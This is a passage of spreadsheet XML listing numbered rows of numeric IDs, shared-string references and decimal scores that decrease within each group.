      <c r="E7762" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7762" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7763" ht="15.75" customHeight="1">
      <c r="A7763" s="1">
        <v>26506.0</v>
      </c>
      <c r="B7763" s="2">
        <v>1.7602802E7</v>
      </c>
      <c r="C7763" s="2" t="s">
        <v>7369</v>
      </c>
      <c r="D7763" s="2">
        <v>1.0</v>
      </c>
      <c r="E7763" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7763" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7764" ht="15.75" customHeight="1">
      <c r="A7764" s="1">
        <v>31388.0</v>
      </c>
      <c r="B7764" s="2">
        <v>4998248.0</v>
      </c>
      <c r="C7764" s="2" t="s">
        <v>7370</v>
      </c>
      <c r="D7764" s="2">
        <v>1.0</v>
      </c>
      <c r="E7764" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7764" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7765" ht="15.75" customHeight="1">
      <c r="A7765" s="1">
        <v>33361.0</v>
      </c>
      <c r="B7765" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C7765" s="2" t="s">
        <v>7371</v>
      </c>
      <c r="D7765" s="2">
        <v>1.0</v>
      </c>
      <c r="E7765" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7765" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7766" ht="15.75" customHeight="1">
      <c r="A7766" s="1">
        <v>10722.0</v>
      </c>
      <c r="B7766" s="2">
        <v>1.5135177E7</v>
      </c>
      <c r="C7766" s="2" t="s">
        <v>7372</v>
      </c>
      <c r="D7766" s="2">
        <v>1.0</v>
      </c>
      <c r="E7766" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7766" s="2">
        <v>0.09081196581196581</v>
      </c>
    </row>
    <row r="7767" ht="15.75" customHeight="1">
      <c r="A7767" s="1">
        <v>19996.0</v>
      </c>
      <c r="B7767" s="2">
        <v>5.7697637E7</v>
      </c>
      <c r="C7767" s="2" t="s">
        <v>7373</v>
      </c>
      <c r="D7767" s="2">
        <v>1.0</v>
      </c>
      <c r="E7767" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7767" s="2">
        <v>0.2675606641123883</v>
      </c>
    </row>
    <row r="7768" ht="15.75" customHeight="1">
      <c r="A7768" s="1">
        <v>33298.0</v>
      </c>
      <c r="B7768" s="2">
        <v>7489603.0</v>
      </c>
      <c r="C7768" s="2" t="s">
        <v>7375</v>
      </c>
      <c r="D7768" s="2">
        <v>1.0</v>
      </c>
      <c r="E7768" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7768" s="2">
        <v>0.2273391812865497</v>
      </c>
    </row>
    <row r="7769" ht="15.75" customHeight="1">
      <c r="A7769" s="1">
        <v>6305.0</v>
      </c>
      <c r="B7769" s="2">
        <v>4.8240545E7</v>
      </c>
      <c r="C7769" s="2" t="s">
        <v>7376</v>
      </c>
      <c r="D7769" s="2">
        <v>1.0</v>
      </c>
      <c r="E7769" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7769" s="2">
        <v>0.2244744744744745</v>
      </c>
    </row>
    <row r="7770" ht="15.75" customHeight="1">
      <c r="A7770" s="1">
        <v>3871.0</v>
      </c>
      <c r="B7770" s="2">
        <v>4.0342206E7</v>
      </c>
      <c r="C7770" s="2" t="s">
        <v>7377</v>
      </c>
      <c r="D7770" s="2">
        <v>1.0</v>
      </c>
      <c r="E7770" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7770" s="2">
        <v>0.2196180555555556</v>
      </c>
    </row>
    <row r="7771" ht="15.75" customHeight="1">
      <c r="A7771" s="1">
        <v>5165.0</v>
      </c>
      <c r="B7771" s="2">
        <v>4.4750867E7</v>
      </c>
      <c r="C7771" s="2" t="s">
        <v>7378</v>
      </c>
      <c r="D7771" s="2">
        <v>1.0</v>
      </c>
      <c r="E7771" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7771" s="2">
        <v>0.2146464646464646</v>
      </c>
    </row>
    <row r="7772" ht="15.75" customHeight="1">
      <c r="A7772" s="1">
        <v>4857.0</v>
      </c>
      <c r="B7772" s="2">
        <v>4.3782674E7</v>
      </c>
      <c r="C7772" s="2" t="s">
        <v>7379</v>
      </c>
      <c r="D7772" s="2">
        <v>1.0</v>
      </c>
      <c r="E7772" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7772" s="2">
        <v>0.2094017094017095</v>
      </c>
    </row>
    <row r="7773" ht="15.75" customHeight="1">
      <c r="A7773" s="1">
        <v>29418.0</v>
      </c>
      <c r="B7773" s="2">
        <v>3.2183238E7</v>
      </c>
      <c r="C7773" s="2" t="s">
        <v>7380</v>
      </c>
      <c r="D7773" s="2">
        <v>1.0</v>
      </c>
      <c r="E7773" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7773" s="2">
        <v>0.2017195767195767</v>
      </c>
    </row>
    <row r="7774" ht="15.75" customHeight="1">
      <c r="A7774" s="1">
        <v>27547.0</v>
      </c>
      <c r="B7774" s="2">
        <v>2.2335486E7</v>
      </c>
      <c r="C7774" s="2" t="s">
        <v>7381</v>
      </c>
      <c r="D7774" s="2">
        <v>1.0</v>
      </c>
      <c r="E7774" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7774" s="2">
        <v>0.1994949494949495</v>
      </c>
    </row>
    <row r="7775" ht="15.75" customHeight="1">
      <c r="A7775" s="1">
        <v>2057.0</v>
      </c>
      <c r="B7775" s="2">
        <v>3.1035707E7</v>
      </c>
      <c r="C7775" s="2" t="s">
        <v>7382</v>
      </c>
      <c r="D7775" s="2">
        <v>1.0</v>
      </c>
      <c r="E7775" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7775" s="2">
        <v>0.1978114478114479</v>
      </c>
    </row>
    <row r="7776" ht="15.75" customHeight="1">
      <c r="A7776" s="1">
        <v>12642.0</v>
      </c>
      <c r="B7776" s="2">
        <v>3.0372995E7</v>
      </c>
      <c r="C7776" s="2" t="s">
        <v>7383</v>
      </c>
      <c r="D7776" s="2">
        <v>1.0</v>
      </c>
      <c r="E7776" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7776" s="2">
        <v>0.1958105646630237</v>
      </c>
    </row>
    <row r="7777" ht="15.75" customHeight="1">
      <c r="A7777" s="1">
        <v>30563.0</v>
      </c>
      <c r="B7777" s="2">
        <v>4.084088E7</v>
      </c>
      <c r="C7777" s="2" t="s">
        <v>7384</v>
      </c>
      <c r="D7777" s="2">
        <v>1.0</v>
      </c>
      <c r="E7777" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7777" s="2">
        <v>0.1952614379084968</v>
      </c>
    </row>
    <row r="7778" ht="15.75" customHeight="1">
      <c r="A7778" s="1">
        <v>6273.0</v>
      </c>
      <c r="B7778" s="2">
        <v>4.8138397E7</v>
      </c>
      <c r="C7778" s="2" t="s">
        <v>7385</v>
      </c>
      <c r="D7778" s="2">
        <v>1.0</v>
      </c>
      <c r="E7778" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7778" s="2">
        <v>0.1948853615520283</v>
      </c>
    </row>
    <row r="7779" ht="15.75" customHeight="1">
      <c r="A7779" s="1">
        <v>23207.0</v>
      </c>
      <c r="B7779" s="2">
        <v>5.2593148E7</v>
      </c>
      <c r="C7779" s="2" t="s">
        <v>7386</v>
      </c>
      <c r="D7779" s="2">
        <v>1.0</v>
      </c>
      <c r="E7779" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7779" s="2">
        <v>0.1944444444444444</v>
      </c>
    </row>
    <row r="7780" ht="15.75" customHeight="1">
      <c r="A7780" s="1">
        <v>13947.0</v>
      </c>
      <c r="B7780" s="2">
        <v>3.7199294E7</v>
      </c>
      <c r="C7780" s="2" t="s">
        <v>7387</v>
      </c>
      <c r="D7780" s="2">
        <v>1.0</v>
      </c>
      <c r="E7780" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7780" s="2">
        <v>0.1937830687830687</v>
      </c>
    </row>
    <row r="7781" ht="15.75" customHeight="1">
      <c r="A7781" s="1">
        <v>2718.0</v>
      </c>
      <c r="B7781" s="2">
        <v>3.4933066E7</v>
      </c>
      <c r="C7781" s="2" t="s">
        <v>7388</v>
      </c>
      <c r="D7781" s="2">
        <v>1.0</v>
      </c>
      <c r="E7781" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7781" s="2">
        <v>0.1931216931216932</v>
      </c>
    </row>
    <row r="7782" ht="15.75" customHeight="1">
      <c r="A7782" s="1">
        <v>3223.0</v>
      </c>
      <c r="B7782" s="2">
        <v>3.7314289E7</v>
      </c>
      <c r="C7782" s="2" t="s">
        <v>7389</v>
      </c>
      <c r="D7782" s="2">
        <v>1.0</v>
      </c>
      <c r="E7782" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7782" s="2">
        <v>0.192652329749104</v>
      </c>
    </row>
    <row r="7783" ht="15.75" customHeight="1">
      <c r="A7783" s="1">
        <v>2801.0</v>
      </c>
      <c r="B7783" s="2">
        <v>3.5329023E7</v>
      </c>
      <c r="C7783" s="2" t="s">
        <v>7390</v>
      </c>
      <c r="D7783" s="2">
        <v>1.0</v>
      </c>
      <c r="E7783" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7783" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="7784" ht="15.75" customHeight="1">
      <c r="A7784" s="1">
        <v>3256.0</v>
      </c>
      <c r="B7784" s="2">
        <v>3.7426359E7</v>
      </c>
      <c r="C7784" s="2" t="s">
        <v>7391</v>
      </c>
      <c r="D7784" s="2">
        <v>1.0</v>
      </c>
      <c r="E7784" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7784" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="7785" ht="15.75" customHeight="1">
      <c r="A7785" s="1">
        <v>29417.0</v>
      </c>
      <c r="B7785" s="2">
        <v>3.2179415E7</v>
      </c>
      <c r="C7785" s="2" t="s">
        <v>7392</v>
      </c>
      <c r="D7785" s="2">
        <v>1.0</v>
      </c>
      <c r="E7785" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7785" s="2">
        <v>0.1923611111111111</v>
      </c>
    </row>
    <row r="7786" ht="15.75" customHeight="1">
      <c r="A7786" s="1">
        <v>10711.0</v>
      </c>
      <c r="B7786" s="2">
        <v>1.499952E7</v>
      </c>
      <c r="C7786" s="2" t="s">
        <v>7393</v>
      </c>
      <c r="D7786" s="2">
        <v>1.0</v>
      </c>
      <c r="E7786" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7786" s="2">
        <v>0.1913580246913581</v>
      </c>
    </row>
    <row r="7787" ht="15.75" customHeight="1">
      <c r="A7787" s="1">
        <v>6447.0</v>
      </c>
      <c r="B7787" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C7787" s="2" t="s">
        <v>7394</v>
      </c>
      <c r="D7787" s="2">
        <v>1.0</v>
      </c>
      <c r="E7787" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7787" s="2">
        <v>0.1901041666666667</v>
      </c>
    </row>
    <row r="7788" ht="15.75" customHeight="1">
      <c r="A7788" s="1">
        <v>12072.0</v>
      </c>
      <c r="B7788" s="2">
        <v>2.662669E7</v>
      </c>
      <c r="C7788" s="2" t="s">
        <v>7395</v>
      </c>
      <c r="D7788" s="2">
        <v>1.0</v>
      </c>
      <c r="E7788" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7788" s="2">
        <v>0.1898148148148149</v>
      </c>
    </row>
    <row r="7789" ht="15.75" customHeight="1">
      <c r="A7789" s="1">
        <v>4595.0</v>
      </c>
      <c r="B7789" s="2">
        <v>4.2804462E7</v>
      </c>
      <c r="C7789" s="2" t="s">
        <v>7396</v>
      </c>
      <c r="D7789" s="2">
        <v>1.0</v>
      </c>
      <c r="E7789" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7789" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="7790" ht="15.75" customHeight="1">
      <c r="A7790" s="1">
        <v>25469.0</v>
      </c>
      <c r="B7790" s="2">
        <v>1.3995169E7</v>
      </c>
      <c r="C7790" s="2" t="s">
        <v>7397</v>
      </c>
      <c r="D7790" s="2">
        <v>1.0</v>
      </c>
      <c r="E7790" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7790" s="2">
        <v>0.188888888888889</v>
      </c>
    </row>
    <row r="7791" ht="15.75" customHeight="1">
      <c r="A7791" s="1">
        <v>23757.0</v>
      </c>
      <c r="B7791" s="2">
        <v>7483775.0</v>
      </c>
      <c r="C7791" s="2" t="s">
        <v>7398</v>
      </c>
      <c r="D7791" s="2">
        <v>1.0</v>
      </c>
      <c r="E7791" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7791" s="2">
        <v>0.1883680555555556</v>
      </c>
    </row>
    <row r="7792" ht="15.75" customHeight="1">
      <c r="A7792" s="1">
        <v>33296.0</v>
      </c>
      <c r="B7792" s="2">
        <v>7483774.0</v>
      </c>
      <c r="C7792" s="2" t="s">
        <v>7399</v>
      </c>
      <c r="D7792" s="2">
        <v>1.0</v>
      </c>
      <c r="E7792" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7792" s="2">
        <v>0.1883680555555556</v>
      </c>
    </row>
    <row r="7793" ht="15.75" customHeight="1">
      <c r="A7793" s="1">
        <v>6438.0</v>
      </c>
      <c r="B7793" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C7793" s="2" t="s">
        <v>7400</v>
      </c>
      <c r="D7793" s="2">
        <v>1.0</v>
      </c>
      <c r="E7793" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7793" s="2">
        <v>0.1864035087719299</v>
      </c>
    </row>
    <row r="7794" ht="15.75" customHeight="1">
      <c r="A7794" s="1">
        <v>8929.0</v>
      </c>
      <c r="B7794" s="2">
        <v>5.4842833E7</v>
      </c>
      <c r="C7794" s="2" t="s">
        <v>7401</v>
      </c>
      <c r="D7794" s="2">
        <v>1.0</v>
      </c>
      <c r="E7794" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7794" s="2">
        <v>0.1864035087719299</v>
      </c>
    </row>
    <row r="7795" ht="15.75" customHeight="1">
      <c r="A7795" s="1">
        <v>28317.0</v>
      </c>
      <c r="B7795" s="2">
        <v>2.5757745E7</v>
      </c>
      <c r="C7795" s="2" t="s">
        <v>7402</v>
      </c>
      <c r="D7795" s="2">
        <v>1.0</v>
      </c>
      <c r="E7795" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7795" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="7796" ht="15.75" customHeight="1">
      <c r="A7796" s="1">
        <v>24676.0</v>
      </c>
      <c r="B7796" s="2">
        <v>1.1584825E7</v>
      </c>
      <c r="C7796" s="2" t="s">
        <v>7403</v>
      </c>
      <c r="D7796" s="2">
        <v>1.0</v>
      </c>
      <c r="E7796" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7796" s="2">
        <v>0.1848816029143898</v>
      </c>
    </row>
    <row r="7797" ht="15.75" customHeight="1">
      <c r="A7797" s="1">
        <v>5589.0</v>
      </c>
      <c r="B7797" s="2">
        <v>4.6097966E7</v>
      </c>
      <c r="C7797" s="2" t="s">
        <v>7404</v>
      </c>
      <c r="D7797" s="2">
        <v>1.0</v>
      </c>
      <c r="E7797" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7797" s="2">
        <v>0.1842592592592593</v>
      </c>
    </row>
    <row r="7798" ht="15.75" customHeight="1">
      <c r="A7798" s="1">
        <v>12402.0</v>
      </c>
      <c r="B7798" s="2">
        <v>2.8978656E7</v>
      </c>
      <c r="C7798" s="2" t="s">
        <v>7405</v>
      </c>
      <c r="D7798" s="2">
        <v>1.0</v>
      </c>
      <c r="E7798" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7798" s="2">
        <v>0.1837606837606838</v>
      </c>
    </row>
    <row r="7799" ht="15.75" customHeight="1">
      <c r="A7799" s="1">
        <v>20340.0</v>
      </c>
      <c r="B7799" s="2">
        <v>1.1584826E7</v>
      </c>
      <c r="C7799" s="2" t="s">
        <v>7403</v>
      </c>
      <c r="D7799" s="2">
        <v>1.0</v>
      </c>
      <c r="E7799" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7799" s="2">
        <v>0.1830601092896176</v>
      </c>
    </row>
    <row r="7800" ht="15.75" customHeight="1">
      <c r="A7800" s="1">
        <v>1313.0</v>
      </c>
      <c r="B7800" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C7800" s="2" t="s">
        <v>7406</v>
      </c>
      <c r="D7800" s="2">
        <v>1.0</v>
      </c>
      <c r="E7800" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7800" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="7801" ht="15.75" customHeight="1">
      <c r="A7801" s="1">
        <v>24382.0</v>
      </c>
      <c r="B7801" s="2">
        <v>1.0777091E7</v>
      </c>
      <c r="C7801" s="2" t="s">
        <v>7407</v>
      </c>
      <c r="D7801" s="2">
        <v>1.0</v>
      </c>
      <c r="E7801" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7801" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="7802" ht="15.75" customHeight="1">
      <c r="A7802" s="1">
        <v>30765.0</v>
      </c>
      <c r="B7802" s="2">
        <v>4.4388498E7</v>
      </c>
      <c r="C7802" s="2" t="s">
        <v>7408</v>
      </c>
      <c r="D7802" s="2">
        <v>1.0</v>
      </c>
      <c r="E7802" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7802" s="2">
        <v>0.1826599326599327</v>
      </c>
    </row>
    <row r="7803" ht="15.75" customHeight="1">
      <c r="A7803" s="1">
        <v>24515.0</v>
      </c>
      <c r="B7803" s="2">
        <v>1.1146714E7</v>
      </c>
      <c r="C7803" s="2" t="s">
        <v>7409</v>
      </c>
      <c r="D7803" s="2">
        <v>1.0</v>
      </c>
      <c r="E7803" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7803" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="7804" ht="15.75" customHeight="1">
      <c r="A7804" s="1">
        <v>2423.0</v>
      </c>
      <c r="B7804" s="2">
        <v>3.3573028E7</v>
      </c>
      <c r="C7804" s="2" t="s">
        <v>7410</v>
      </c>
      <c r="D7804" s="2">
        <v>1.0</v>
      </c>
      <c r="E7804" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7804" s="2">
        <v>0.179783950617284</v>
      </c>
    </row>
    <row r="7805" ht="15.75" customHeight="1">
      <c r="A7805" s="1">
        <v>3766.0</v>
      </c>
      <c r="B7805" s="2">
        <v>3.9823658E7</v>
      </c>
      <c r="C7805" s="2" t="s">
        <v>7411</v>
      </c>
      <c r="D7805" s="2">
        <v>1.0</v>
      </c>
      <c r="E7805" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7805" s="2">
        <v>0.1795634920634921</v>
      </c>
    </row>
    <row r="7806" ht="15.75" customHeight="1">
      <c r="A7806" s="1">
        <v>22903.0</v>
      </c>
      <c r="B7806" s="2">
        <v>4.8091871E7</v>
      </c>
      <c r="C7806" s="2" t="s">
        <v>7412</v>
      </c>
      <c r="D7806" s="2">
        <v>1.0</v>
      </c>
      <c r="E7806" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7806" s="2">
        <v>0.178921568627451</v>
      </c>
    </row>
    <row r="7807" ht="15.75" customHeight="1">
      <c r="A7807" s="1">
        <v>7446.0</v>
      </c>
      <c r="B7807" s="2">
        <v>5.1219349E7</v>
      </c>
      <c r="C7807" s="2" t="s">
        <v>7413</v>
      </c>
      <c r="D7807" s="2">
        <v>1.0</v>
      </c>
      <c r="E7807" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7807" s="2">
        <v>0.1786140979689367</v>
      </c>
    </row>
    <row r="7808" ht="15.75" customHeight="1">
      <c r="A7808" s="1">
        <v>9259.0</v>
      </c>
      <c r="B7808" s="2">
        <v>5.5483142E7</v>
      </c>
      <c r="C7808" s="2" t="s">
        <v>7414</v>
      </c>
      <c r="D7808" s="2">
        <v>1.0</v>
      </c>
      <c r="E7808" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7808" s="2">
        <v>0.1785714285714286</v>
      </c>
    </row>
    <row r="7809" ht="15.75" customHeight="1">
      <c r="A7809" s="1">
        <v>23892.0</v>
      </c>
      <c r="B7809" s="2">
        <v>8425293.0</v>
      </c>
      <c r="C7809" s="2" t="s">
        <v>7415</v>
      </c>
      <c r="D7809" s="2">
        <v>1.0</v>
      </c>
      <c r="E7809" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7809" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="7810" ht="15.75" customHeight="1">
      <c r="A7810" s="1">
        <v>6394.0</v>
      </c>
      <c r="B7810" s="2">
        <v>4.8461609E7</v>
      </c>
      <c r="C7810" s="2" t="s">
        <v>7416</v>
      </c>
      <c r="D7810" s="2">
        <v>1.0</v>
      </c>
      <c r="E7810" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7810" s="2">
        <v>0.177938808373591</v>
      </c>
    </row>
    <row r="7811" ht="15.75" customHeight="1">
      <c r="A7811" s="1">
        <v>6835.0</v>
      </c>
      <c r="B7811" s="2">
        <v>4.9596959E7</v>
      </c>
      <c r="C7811" s="2" t="s">
        <v>7417</v>
      </c>
      <c r="D7811" s="2">
        <v>1.0</v>
      </c>
      <c r="E7811" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7811" s="2">
        <v>0.1775956284153005</v>
      </c>
    </row>
    <row r="7812" ht="15.75" customHeight="1">
      <c r="A7812" s="1">
        <v>1660.0</v>
      </c>
      <c r="B7812" s="2">
        <v>2.8161719E7</v>
      </c>
      <c r="C7812" s="2" t="s">
        <v>7418</v>
      </c>
      <c r="D7812" s="2">
        <v>1.0</v>
      </c>
      <c r="E7812" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7812" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="7813" ht="15.75" customHeight="1">
      <c r="A7813" s="1">
        <v>6890.0</v>
      </c>
      <c r="B7813" s="2">
        <v>4.9784551E7</v>
      </c>
      <c r="C7813" s="2" t="s">
        <v>7419</v>
      </c>
      <c r="D7813" s="2">
        <v>1.0</v>
      </c>
      <c r="E7813" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7813" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="7814" ht="15.75" customHeight="1">
      <c r="A7814" s="1">
        <v>13393.0</v>
      </c>
      <c r="B7814" s="2">
        <v>3.4962786E7</v>
      </c>
      <c r="C7814" s="2" t="s">
        <v>7420</v>
      </c>
      <c r="D7814" s="2">
        <v>1.0</v>
      </c>
      <c r="E7814" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7814" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="7815" ht="15.75" customHeight="1">
      <c r="A7815" s="1">
        <v>30883.0</v>
      </c>
      <c r="B7815" s="2">
        <v>4.6384382E7</v>
      </c>
      <c r="C7815" s="2" t="s">
        <v>7421</v>
      </c>
      <c r="D7815" s="2">
        <v>1.0</v>
      </c>
      <c r="E7815" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7815" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="7816" ht="15.75" customHeight="1">
      <c r="A7816" s="1">
        <v>6493.0</v>
      </c>
      <c r="B7816" s="2">
        <v>4.8695115E7</v>
      </c>
      <c r="C7816" s="2" t="s">
        <v>7422</v>
      </c>
      <c r="D7816" s="2">
        <v>1.0</v>
      </c>
      <c r="E7816" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7816" s="2">
        <v>0.1766169154228856</v>
      </c>
    </row>
    <row r="7817" ht="15.75" customHeight="1">
      <c r="A7817" s="1">
        <v>20402.0</v>
      </c>
      <c r="B7817" s="2">
        <v>1.2189681E7</v>
      </c>
      <c r="C7817" s="2" t="s">
        <v>7423</v>
      </c>
      <c r="D7817" s="2">
        <v>1.0</v>
      </c>
      <c r="E7817" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7817" s="2">
        <v>0.1765232974910395</v>
      </c>
    </row>
    <row r="7818" ht="15.75" customHeight="1">
      <c r="A7818" s="1">
        <v>5106.0</v>
      </c>
      <c r="B7818" s="2">
        <v>4.4528448E7</v>
      </c>
      <c r="C7818" s="2" t="s">
        <v>7424</v>
      </c>
      <c r="D7818" s="2">
        <v>1.0</v>
      </c>
      <c r="E7818" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7818" s="2">
        <v>0.1764132553606238</v>
      </c>
    </row>
    <row r="7819" ht="15.75" customHeight="1">
      <c r="A7819" s="1">
        <v>3001.0</v>
      </c>
      <c r="B7819" s="2">
        <v>3.6296153E7</v>
      </c>
      <c r="C7819" s="2" t="s">
        <v>7425</v>
      </c>
      <c r="D7819" s="2">
        <v>1.0</v>
      </c>
      <c r="E7819" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7819" s="2">
        <v>0.1763285024154589</v>
      </c>
    </row>
    <row r="7820" ht="15.75" customHeight="1">
      <c r="A7820" s="1">
        <v>7643.0</v>
      </c>
      <c r="B7820" s="2">
        <v>5.1773894E7</v>
      </c>
      <c r="C7820" s="2" t="s">
        <v>7426</v>
      </c>
      <c r="D7820" s="2">
        <v>1.0</v>
      </c>
      <c r="E7820" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7820" s="2">
        <v>0.1753968253968254</v>
      </c>
    </row>
    <row r="7821" ht="15.75" customHeight="1">
      <c r="A7821" s="1">
        <v>9624.0</v>
      </c>
      <c r="B7821" s="2">
        <v>5.6213162E7</v>
      </c>
      <c r="C7821" s="2" t="s">
        <v>7427</v>
      </c>
      <c r="D7821" s="2">
        <v>1.0</v>
      </c>
      <c r="E7821" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7821" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="7822" ht="15.75" customHeight="1">
      <c r="A7822" s="1">
        <v>11696.0</v>
      </c>
      <c r="B7822" s="2">
        <v>2.3479052E7</v>
      </c>
      <c r="C7822" s="2" t="s">
        <v>7428</v>
      </c>
      <c r="D7822" s="2">
        <v>1.0</v>
      </c>
      <c r="E7822" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7822" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="7823" ht="15.75" customHeight="1">
      <c r="A7823" s="1">
        <v>17124.0</v>
      </c>
      <c r="B7823" s="2">
        <v>4.8805544E7</v>
      </c>
      <c r="C7823" s="2" t="s">
        <v>7429</v>
      </c>
      <c r="D7823" s="2">
        <v>1.0</v>
      </c>
      <c r="E7823" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7823" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="7824" ht="15.75" customHeight="1">
      <c r="A7824" s="1">
        <v>21501.0</v>
      </c>
      <c r="B7824" s="2">
        <v>2.3112927E7</v>
      </c>
      <c r="C7824" s="2" t="s">
        <v>7430</v>
      </c>
      <c r="D7824" s="2">
        <v>1.0</v>
      </c>
      <c r="E7824" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7824" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="7825" ht="15.75" customHeight="1">
      <c r="A7825" s="1">
        <v>4778.0</v>
      </c>
      <c r="B7825" s="2">
        <v>4.3439879E7</v>
      </c>
      <c r="C7825" s="2" t="s">
        <v>7431</v>
      </c>
      <c r="D7825" s="2">
        <v>1.0</v>
      </c>
      <c r="E7825" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7825" s="2">
        <v>0.1712962962962963</v>
      </c>
    </row>
    <row r="7826" ht="15.75" customHeight="1">
      <c r="A7826" s="1">
        <v>10634.0</v>
      </c>
      <c r="B7826" s="2">
        <v>1.403984E7</v>
      </c>
      <c r="C7826" s="2" t="s">
        <v>7432</v>
      </c>
      <c r="D7826" s="2">
        <v>1.0</v>
      </c>
      <c r="E7826" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7826" s="2">
        <v>0.1710069444444445</v>
      </c>
    </row>
    <row r="7827" ht="15.75" customHeight="1">
      <c r="A7827" s="1">
        <v>7266.0</v>
      </c>
      <c r="B7827" s="2">
        <v>5.0770703E7</v>
      </c>
      <c r="C7827" s="2" t="s">
        <v>7433</v>
      </c>
      <c r="D7827" s="2">
        <v>1.0</v>
      </c>
      <c r="E7827" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7827" s="2">
        <v>0.1703096539162114</v>
      </c>
    </row>
    <row r="7828" ht="15.75" customHeight="1">
      <c r="A7828" s="1">
        <v>9374.0</v>
      </c>
      <c r="B7828" s="2">
        <v>5.56988E7</v>
      </c>
      <c r="C7828" s="2" t="s">
        <v>7434</v>
      </c>
      <c r="D7828" s="2">
        <v>1.0</v>
      </c>
      <c r="E7828" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7828" s="2">
        <v>0.1700854700854701</v>
      </c>
    </row>
    <row r="7829" ht="15.75" customHeight="1">
      <c r="A7829" s="1">
        <v>33857.0</v>
      </c>
      <c r="B7829" s="2">
        <v>9044389.0</v>
      </c>
      <c r="C7829" s="2" t="s">
        <v>7435</v>
      </c>
      <c r="D7829" s="2">
        <v>1.0</v>
      </c>
